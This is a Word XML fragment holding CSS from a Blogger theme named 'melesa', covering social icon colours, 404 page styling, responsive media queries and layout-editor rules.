    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-youtube, .melesa-author .fa-youtube-play, .melesa-author .fa-youtube-square{color: #cd201f}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-stumbleupon, .melesa-author .fa-stumbleupon-circle{color:#eb4924}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-reddit-alien, .melesa-author .fa-reddit-square, .melesa-author .fa-reddit{color: #ff5700}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-quora{color:#b92b27}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-yelp{color: #af0606}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-weibo{color:#df2029}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-product-hunt{color: #da552f}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-hacker-news{color: #ff6600}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-soundcloud{color: #ff3300}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-rss, .melesa-author .fa-rss-square{color: #f57d00}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-whatsapp{color:#25D366}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-weixin{color: #09b83e}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-medium{color: #02b875}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-vine{color: #00b489}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-slack{color: #3aaf85}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-instagram{color: #e4405f}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-dribbble{color: #ea4c89}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-flickr{color: #ff0084}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-foursquare{color: #f94877}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-behance-square, .melesa-author .fa-behance{color: #131418}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-snapchat, .melesa-author .fa-snapchat-square, .melesa-author .fa-snapchat-ghost{color:#FFFC00}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-codepen{color: #222}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.melesa-author .fa-stack-overflow{color: #f57d00}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-digg{color:#131418}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-delicious{color:#0084ff}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.breadcrumbs{width: 100%;overflow: hidden;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Error Page */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-404 .searchform{max-width: 80%;margin: 10px 0px;margin-top:40px}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-404 input,.melesa-404 button{border-radius: 0px !important;padding: 20px 30px;font-size:15px;display: table !important;height: 100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-404{padding: 100px 0px}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-404 button{background: $maincolor;border-color: $maincolor}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-404 button:hover{background: $darkcolor;border-color: $darkcolor;cursor:pointer}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* credit link */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#credit-blsm{line-height: 25px;margin-bottom:20px;padding-top:20px;border-top:1px solid rgba(255,255,255,0.1);margin-top:15px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*BAGO*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body, header.compact .sf-menu &gt; li,.news-ticker-controls,.rabbi-ticker-swipe, .rabbi-ticker-swipe span{background: $bagocolor}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-grid.grid-2 .row{flex-wrap: wrap !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.blog-posts{width:100%}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Media Queries */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>@media only screen and (max-width:992px){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget &gt; .grid-3 &gt; .row &gt; div:first-child {padding: 0px 0px}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-3 &gt; .row &gt; .col-lg-6:nth-child(2) &gt; .row{margin: 0px -9px!important}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-2 &gt; .row &gt; .col-lg-4:nth-child(2) &gt; .row{margin: 0px 0px!important}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-1 &gt; .row &gt; .col-lg-6:nth-child(2) &gt; .row{margin: 0px 0px!important}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-grid .row{flex-wrap: wrap !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>@media only screen and (max-width:900px){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-cols-3 .columns-cell{width:100%;max-width: 320px;float: none;margin: 0 auto;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>header .advertisement-top{max-width: 100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>@media only screen and (max-width:840px){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*Responsive Nav*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.responsive-navigation select{font-color:#aaa;background: transparent;-webkit-appearance: none;-moz-appearance: none;text-indent: 1px;text-overflow: '';border:0px solid #fff}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.responsive-navigation select::-ms-expand {display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.topmenus .responsive-navigation select{border:0px solid rgba(255,255,255,0.2);color: #fff;padding:0px 10px}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.topmenus .responsive-navigation select option{color: #aaa}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.responsive-navigation:before{content: "\f20e";font-family: "Ionicons";color: #aaa}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .responsive-navigation{border:1px solid #ccc;padding: 2px 10px;margin-top:5px}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#NavM,#NavO{display:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .responsive-navigation{display: block;float: left;padding: 2px 10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header #NavS .responsive-navigation{float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .nav-left .dropmenu{display: none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.header-logo{text-align: center}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-post-title{line-height:30px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>@media only screen and (max-width:800px){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-post-title{font-size:28px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>@media only screen and (max-width: 576px){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.default .ajax_pickup &gt; .row &gt; .col-sm-6:first-child{height: 250px}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .author-img{float: none;width: 100%;text-align: center;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .author-content{padding-left: 0px; text-align: center;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .content-social-author{display: block;text-align: center;width: 100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .content-social-author ul{text-align: center;display: inline-block;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>@media only screen and (max-width:600px){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-cols-2 .columns-cell{width:100%;max-width: 320px;float: none;margin: 0 auto;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>]]&gt;&lt;/b:skin&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:template-skin&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:variable default='960px' name='content.width' type='length' value='860px'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:variable default='0' name='main.column.left.width' type='length' value='0px'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:variable default='310px' name='main.column.right.width' type='length' value='260px'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>max-width: $(content.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .content-outer, .content-fauxcolumn-outer, body#layout  .region-inner {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>min-width: $(content.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>max-width: $(content.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>_width: $(content.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .main-inner .columns {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>padding-left: $(main.column.left.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>padding-right: $(main.column.right.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .main-inner .fauxcolumn-center-outer {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>left: $(main.column.left.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>right: $(main.column.right.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>_width: expression(this.parentNode.offsetWidth -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>parseInt("$(main.column.left.width)") -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>parseInt("$(main.column.right.width)") + 'px');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .main-inner .fauxcolumn-left-outer {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>width: $(main.column.left.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .main-inner .fauxcolumn-right-outer {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>width: $(main.column.right.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .main-inner .column-left-outer {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>width: $(main.column.left.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>right: $(main.column.left.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>margin-left: -$(main.column.left.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .main-inner .column-right-outer {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>width: $(main.column.right.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>margin-right: -$(main.column.right.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#layout {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>min-width: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#layout .content-outer {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>min-width: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>width: 800px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#layout .region-inner {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>min-width: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>width: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout div.add_widget {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>padding: 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout div.add_widget a {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>margin-left: 32px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .adminpanel{display:table !important;width:270px;left:0px;top:0px;bottom:0px;height:100%;float:left;padding-top:250px;padding-left:0px;padding-right:0px;background-color: #ff1769;background: -moz-linear-gradient(45deg,#ff1769 0%,#ff1769 25%,#c471f5 100%);background: -webkit-linear-gradient(45deg,#ff1769 0%,#ff1769 25%,#c471f5 100%);background: linear-gradient(45deg,#ff1769 0%,#ff1769 25%,#c471f5 100%);box-sizing:border-box;padding-top:100px;float:left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .adminpanel .section{border:0px !important}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .section{background:transparent !important}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .adminpanel .section h4{color:#fff;margin:20px 0px}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .nav-left{width:45%;float:left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .right-social{width:45%;float:right}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .topmenus .container:after{clear:none !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .topmenus{display:table;width:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .nav-bak{display:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .header-logo #header{width:45%;float:left}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .advertisement-top{width:45%;float:right;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout #NavG{width:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .search-act{display:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .row-custom .container:after{clear:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>body#layout .melesa-news{display:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .melesa-cols-3 .columns-cell{width:30%;float:left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .melesa-cols-2 .columns-cell{width:45%;float:left;}</w:t>
